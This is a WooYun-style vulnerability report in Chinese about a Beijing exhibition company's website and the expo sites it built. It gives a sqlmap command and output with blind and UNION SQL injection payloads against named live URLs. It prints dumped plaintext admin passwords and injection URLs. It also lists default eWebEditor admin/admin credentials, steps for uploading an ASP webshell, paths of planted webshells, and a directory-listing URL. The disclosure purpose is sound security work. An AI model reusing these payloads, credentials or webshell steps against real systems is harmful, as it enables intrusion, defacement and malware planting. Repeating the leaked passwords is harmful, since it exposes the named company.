WooYun.org

北京海闻展览有限公司官网及其制作的所有展览会网站ewebeditor存在SQL盲注漏洞及后台弱口令
问题描述：
1.http://www.hwexpo.com北京海闻展览有限公司存在SQL盲注漏洞，包括其制作的12个展览会网站。后台密码相对简单。
比如注入点：
http://www.hwexpo.com/index.asp?tid=523
通过
D:\VulDig\SQL Injection\sqlmapproject-sqlmap-ad07add>sqlmap.py -u "http://www.hw
expo.com/index.asp?tid=523" --dump
可判断后台为windows 2008+ASP.NET+IIS 7.5+Access数据库。

Place: GET
Parameter: tid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=523 AND 9855=9855
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: tid=523 UNION ALL SELECT NULL,NULL,CHR(58)&CHR(114)&CHR(97)&CHR(116
)&CHR(58)&CHR(74)&CHR(65)&CHR(68)&CHR(74)&CHR(114)&CHR(76)&CHR(98)&CHR(86)&CHR(7
7)&CHR(74)&CHR(58)&CHR(97)&CHR(109)&CHR(115)&CHR(58),NULL,NULL,NULL,NULL FROM MS
ysAccessObjects%00

得到后台管理员数据表的数据：
Table: admin
[3 entries]
+----+------+--------------+------------+
| id | data | admin_pass | admin_name |
+----+------+--------------+------------+
| 10 | <blank> | zhangruidong | ranky |
| 11 | <blank> | haiwen7180 | admin |
| 9 | <blank> | 68659227 | admin |
+----+------+--------------+------------+

可看到 密码设置相对简单，或者全为字母的人名，或者是有关键词(haiwen)+数字，或者是仅仅的8位数字，很容易Brute force.
顺利登录管理后台:
http://www.hwexpo.com/admin/

到这里，攻击者特别是竞争对手可以进行多项对公司有害的事情，在公司官方网站发布虚假信息，最简单的是修改里边的如展览排期、动画、新闻，企业内容，以损害公司名誉与信誉。或者挂木马，让访问者中招。可利用的情形很多，没做上传webshell的验证。
另外，公司的官网及制作的全部展览网站(12个)WEB服务器开启了错误回显，存在SQL注入漏洞，为攻击者提供了极大的便利，特别是遇到自动化sqlmap之类的工具时，后台数据安全性更显得脆弱。如下图：
SQL注入命令的URL形式：
http://www.bjminexpo.com/index.asp?news_id=300%20AND%20(SELECT%20TOP%201%20pass%20FROM%20users)%00

SQL注入命令的URL形式：
http://www.bjminexpo.com/index.asp?news_id=300%20AND%20(SELECT%20TOP%201%20pass%20FROM%20user)%00

由这两个可判断出表名，这也就是前边用sqlmap可以爆破公司官网后台管理员密码的原因。
2.制作的展览会网站，使用了ewebeditor5.5的默认设置，这滋生了一系列安全脆弱性。
2.1 ewebeditor后台弱口令漏洞（账号与密码均为admin)
如：
http://www.bjminexpo.com/ewebeditor/admin/login.asp?

2.2 模板可以修改支持asp上传漏洞：

主要是修改了媒体上传类型可以为asp。
在样式预览时，在打开的编辑器中上传 媒体，选择上传asp webshell，后台自动上传之。再回到上传管理中，找到刚上传的重命名的asp。
上传webshell后执行的结果:
http://www.cidtexpo.com/ewebeditor/uploadfile/20130611171003749.asp

其制作的展览会网站有的已被上传了webshell，这意味着这些服务器可能被其它攻击者用于其它用途。如另一个展会网站上：
http://www.sti-expo.com/ewebeditor/uploadfile/f.asp

已顺手清除了部分webshell，www.sti-expo.com上只留上一个。
2.3 目录列举漏洞
如：
http://www.bjminexpo.com/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

谷歌一搜，北京海闻展览公司也有点名气。
影响网站：
北京海闻展览公司官网：
http://www.hwexpo.com/
及其制作的展览会网站（10余个）：
http://www.bjminexpo.com/
http://www.cidtexpo.com/
http://www.htifexpo.com/
http://www.fmfexpo.com/
http://www.bciffe.com/
http://www.bcime.com/
http://www.bjminexpo.com/
http://www.hwexpo.com/
....
第一次系统的挖漏洞，希望能拿到个乌云混邀请码。
先是仔细读了刺总的《白帽子讲Web安全》，一边搜索，一边学js和php,asp的东西，还用ampserver在本地验证webshell的可用性。首先用GHDB,和gooogle hacking search。找到一些jboss 远程命令漏洞，但站太小了或者addURL后不能执行，还碰到amazonaws.com 一个分站的jboss小问题，但上传的webshell不能成功运行。tomcat后台入口漏洞，用metatsploit扫描，密码强度似乎都较强。